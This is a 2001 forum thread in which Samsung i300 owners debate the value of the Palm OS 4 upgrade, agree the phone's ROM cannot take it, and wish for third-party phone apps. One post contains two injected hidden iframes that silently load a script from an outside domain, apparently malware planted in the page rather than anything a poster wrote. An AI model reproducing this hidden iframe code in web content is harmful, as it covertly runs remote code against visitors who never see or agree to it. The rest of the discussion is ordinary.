+ Reply to Thread

What's the benefit of going with Palm OS 4?

Ok, I read the hype on the website, but is it worth the $40.00? Are the supposed upgrades worth the price. The I300 comes with 3.52.

dee<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    oh, you're supposed to READ the manual....

Won't work on the I-300, right?

I own a Kyocera phone, and I know the OS4 upgrade won't work on that phone, so I'd guess the same applies to the Samsung. According to Palm, it's only their branded hardware that will accept the OS4, as I recall....

Administrator

Arrow

the rossman is correct! 4.x wont work for us... sprint/samsung will have to get 4.x and "brand" it to our specific phones in order for us to take advantage of anything in the 4.x release...

I would not count on that happening. According to a Samsung Tech, they have no plans to provide an OS4 upgrade and the ROM is not flashable.

Administrator

Arrow

Originally posted by Adam17
    I would not count on that happening. According to a Samsung Tech, they have no plans to provide an OS4 upgrade...
    right! i only meant the only way we could ever benefit from a 4.x is if samsung made one for us... we cant simply go DL the 4.x from the palm site...

probably the next 3g smartphone from samsung will have 4.x... :p

If the ROM is, indeed, not flashable, I don't think we could ever get an upgrade, no matter how hard Samsung worked on it. I don't believe this is an upgrade that can be accomplished via a "patch".

Scott

As far as I know, the only usableusable feature of the Palm 4.0 OS is increased heap size, if you're a Palm OS programmer.

The maximum heap in the Samsung 3.5.2 Palm OS implementation has been increased to reflect that of the 4.0 OS;
    if there are other features available in 4.0 that impact the average user, please let me know what they are...

Let's start with the PalmOS4 New Feature Set's Telephony API

While admittedly average users don't sit down and play with CodeWarrior for a few hours every night, the PalmOS4 New Feature Set's telephony API would make it a lot easier for non-Samsung developers to develop custom phone applications, which mainstream non-programmer users WOULD download from Palmgear and play with.

So far, the i300 SDK is still vaporware. Until it appears (or someone hacks it independently of Samsung and posts the info all over the internet to spite them), nobody can write third-party phone applications for the i300. If the i300 were using PalmOS4, Samsung's cooperation would be irrelevant, beause the SDK is freely available from Palm.

What kind of third-party apps is there demand for? Well, just to list a few things that lots of i300 owners find irritating (and could easily be remedied via new software):

-- awkward toggling of keyguard. An ideal mechanism would allow users to set a user-defined hardkey pattern (say, notepad-notepad-calendar-notepad-addressbook) that would unlock the Palm and enable phone usage.

-- awkward toggling of speakerphone function

plus lots of things that fall into the "cool and cute" category

-- photo caller ID (enabling users to upload bitmaps and associate them with addressbook records for display during incoming calls)

-- custom ringtones

and, falling into the hardcore fantasy, but theoretically possible category...

-- Palm-hosted interactive voice response system to answer incoming cellular calls and and handle them appropriately. This one's probably a bit unrealistic since it would probably require a more intimate marriage between the CDMA and Dragonball hardware than is likely to be the case, but hey, you never know what cool creative app someone will come up with that nobody's thought of yet.

-- Integrating the (upcoming) ability of Sprint's phone network to locate users to within a few hundred feet with the alarm and to-do list to create geographically-based alarms ("10 minutes after arriving at the office, remind me to call xxxxx" or "as soon as I'm within 1000 feet of the gas station by my house, fire off an alarm reminding me to get gas and buy a gallon of milk")

-- or, if you want something that's both practical and achievable TODAY, a Palm app that probes the phone's tower ID/signal strength debug info and uses it to identify its approximate location (the user would have to be physically present in an area and tell the app to define that location as a waypoint for future use) based upon the towers the phone can "see" and the relative strength of each. So "home" might be towers F, Q, and J, with F much stronger than Q and J. "grocery store" might be towers Q, J, S, and K, with Q's signal strength pegged, K and S barely there, and J somewhere in between, etc. I can see such an app easily being able to enjoy granularity to within a half mile or so if it ranked them as "about equal", "a lot weaker", and "a lot stronger" relative to each other and the app had some degree of knowledge regarding the absolute lat/long of each tower in an area. Obviously not terribly useful for people who live in small towns where everything is within walking distance, but for people who live in big cities where major road intersections (and the activity centers they define) are a mile apart anyway, it would probably be good enough to be useful.
    Last edited by miamicanes; 12-18-2001 at 01:21 AM.